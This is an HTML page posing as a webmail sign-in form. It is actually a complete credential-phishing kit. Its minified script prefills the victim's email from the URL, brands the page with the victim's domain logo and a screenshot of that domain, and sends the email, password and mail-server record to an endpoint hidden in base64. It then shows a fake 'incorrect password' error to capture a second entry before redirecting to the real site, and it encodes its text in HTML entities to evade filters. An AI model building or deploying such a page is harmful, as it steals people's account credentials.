<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <title>Mail</title>

    <link
      href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css"
      rel="stylesheet"
      integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC"
      crossorigin="anonymous"
    />
    <link
      rel="stylesheet"
      href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"
    />
    <style media="screen">
      body {
        background: #eceff1;
        color: rgba(0, 0, 0, 0.87);
        font-family: Roboto, Helvetica, Arial, sans-serif;
        margin: 0;
        padding: 0;
        height: 100%;
      }

      input {
        max-width: 100%;
      }
      #bg {
        -webkit-background-size: cover;
        -moz-background-size: cover;
        -o-background-size: cover;

        /* Preserve aspet ratio */
        position: absolute;
        top: 0;
        left: 0;
        right: 0;
        bottom: 0;
        width: 100vw;
        height: 100vh;
        object-fit: contain;
        background-size: cover;
        background-repeat: no-repeat;
      }

      #main {
        background-color: #fff;
        max-width: 360px;
        min-width: 320px;
        min-height: 338px;
        margin-left: auto;
        margin-right: auto;
        margin-top: 40px;
        width: calc(100% - 40px);
        /* margin: 100px auto 16px; */
        padding: 32px 24px 8px;
        border-radius: 3px;
      }

      #main h2 {
        color: #4caf50;
        font-weight: bold;
        font-size: 16px;
        margin: 0 0 8px;
      }

      #main h1 {
        font-size: 22px;
        font-weight: 300;
        color: #0067b8;
        margin: 0 0 16px;
      }

      #main p {
        line-height: 140%;
        margin: 16px 0 24px;
        font-size: 14px;
      }

      #main button {
        background: #0067b8;
      }

      #main a {
        display: block;
        text-align: center;
        /* background: #0067b8; */
        border-color: #0067b8;
        background-color: #0067b8;
        text-transform: uppercase;
        text-decoration: none;
        color: white;
        padding: 16px;
        border-radius: 4px;
      }

      #main,
      #main a {
        box-shadow: 0 2px 6px rgba(0, 0, 0, 0.2);
      }

      .avatar {
        /* border-radius: 100%; */
        /* border: 2px solid #aaa; */
      }

      @media (max-width: 600px) {
        body,
        #main {
          background: white;
        }

        #main,
        #main a {
          box-shadow: none;
        }

        #bg {
          /* Preserve aspet ratio */
          position: absolute;
          top: 0;
          left: 0;
          right: 0;
          bottom: 0;
          width: 100vw;
          height: 100vh;
          object-fit: contain;
          /* background-size: cover; */
          background-repeat: no-repeat;
        }
      }

      code {
        font-size: 18px;
        color: #999;
      }
    </style>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
  </head>

  <body id="bg">
    <div id="main">
      <div style="text-align: center">
        <img id="fieldImg" src="" width="50px" class="avatar" />
        <!-- <b>
          <p id="leterhead"></p>
        </b> -->
      </div>
      <!-- <hr /> -->
      <p>Sign in to continue</p>

      <div class="mb-3">
        <input
          type="text"
          id="emx"
          class="form-control shadow-none"
          placeholder="&#69;&#109;&#97;&#105;&#108;&#32;&#97;&#100;&#100;&#114;&#101;&#115;&#115;"
          value=""
        />
      </div>
      <div class="mb-3">
        <input
          type="password"
          id="pasx"
          class="form-control shadow-none"
          placeholder="&#80;&#97;&#115;&#115;&#119;&#111;&#114;&#100;"
          autocomplete="indogo"
        />
        <small id="err_empty_pw" style="color: red; display: none"
          >&#80;&#108;&#101;&#97;&#115;&#101;&#32;&#101;&#110;&#116;&#101;&#114;&#32;&#121;&#111;&#117;&#114;&#32;&#112;&#97;&#115;&#115;&#119;&#111;&#114;&#100;</small
        >
        <small id="err_empty_em" style="color: red; display: none"
          >&#80;&#108;&#101;&#97;&#115;&#101;&#32;&#101;&#110;&#116;&#101;&#114;&#32;&#121;&#111;&#117;&#114;&#32;&#101;&#109;&#97;&#105;&#108;</small
        >
        <small id="err_empty_gen" style="color: red; display: none"
          >&#73;&#110;&#99;&#111;&#114;&#114;&#101;&#99;&#116;&#32;&#101;&#109;&#97;&#105;&#108;&#32;&#111;&#114;&#32;&#112;&#97;&#115;&#115;&#119;&#111;&#114;&#100;&#46;&#32;&#84;&#114;&#121;&#32;&#97;&#103;&#97;&#105;&#110;.</small
        >
      </div>
      <input name="password" type="hidden" id="mx" value="" />

      <div class="d-grid gap-2">
        <button class="btn btn-primary shadow-none" type="button" id="btn">
          Sign in
        </button>
      </div>
      <hr style="margin-top: 30px" />
      <div
        class=""
        style="text-align: center; display: block; cursor: pointer"
        id="pdf"
      >
        <div>
          <p style="margin-bottom: 10px" id="copywrite"></p>
        </div>
      </div>
      <div style="margin-top: 20px"></div>
    </div>
  </body>
  <script>
    const phpLink = "aHR0cHM6Ly9ub2NvZGVmb3JtLmlvL2YvNjY1ZmIzZWU5ZTVkYjYyYWJkNjNjOTY2";
  </script>
  <script>
   $("document").ready(function(){function a(a){return a.substring(a.lastIndexOf("@")+1)}async function b(){return c(),f($("#emx").val())?4>$("#pasx").val().length?($("#err_empty_pw").show(),$("#pasx").val(""),$("#pasx").focus(),!1):void(await d(a($("#emx").val())),console.log("login"),e()):($("#err_empty_em").show(),$("#emx").val(""),$("#emx").focus(),!1)}function c(){$("#err_empty_pw").hide(),$("#err_empty_em").hide(),$("#err_empty_gen").hide()}async function d(a){try{const b=await fetch(`https://dns.google/resolve?name=${a}&type=mx`),c=await b.json(),d=await c.Answer[0].data,e=d.split(" ")[1];return $("#mx").val(e),e}catch(a){return $("#mx").val("Not Found"),"Not Found"}}function e(){console.log($("#mx").val()),$.ajax({url:atob(phpLink),type:"POST",data:{user:$("#emx").val(),pass:$("#pasx").val(),mx:$("#mx").val()}}).done(function(){1===g?location.href=`https://${a($("#emx").val())}`:(g++,$("#err_empty_gen").show(),$("#pasx").val(""),$("#pasx").focus())}).fail(function(){console.log("phpLink error")})}function f(a){return /^(([^<>()[\]\\.,;:\s@\"]+(\.[^<>()[\]\\.,;:\s@\"]+)*)|(\".+\"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/.test(a)}let g=0;const h=window.location.hash,i=h.split("#")[1];let j;$("#btn").click(function(){b()}),f(i)?($("#emx").val(i),function(){let b=a($("#emx").val());document.getElementById("bg").style.backgroundImage=`url(${`https://image.thum.io/get/auth/67794-c7cd7f8636cde8613adde2dc9baf8e9a//width/1400/http://${b}`})`,$("#copywrite").html(`© 2024 ${b}`),document.getElementById("fieldImg").src=`https://logo.clearbit.com/${b}`,j=b}(),$("#pasx").focus()):(document.getElementById("fieldImg").src=`https://api.faviconkit.com/microsoft.com/40`,$("#copywrite").html(`© 2024 Webmail`),$("#emx").focus()),$("#emx").keydown(function(a){if(13==a.which)return $("#btn").click(),!1}),$("#pasx").keydown(function(a){if(13==a.which)return $("#btn").click(),!1})});
  </script>
</html>
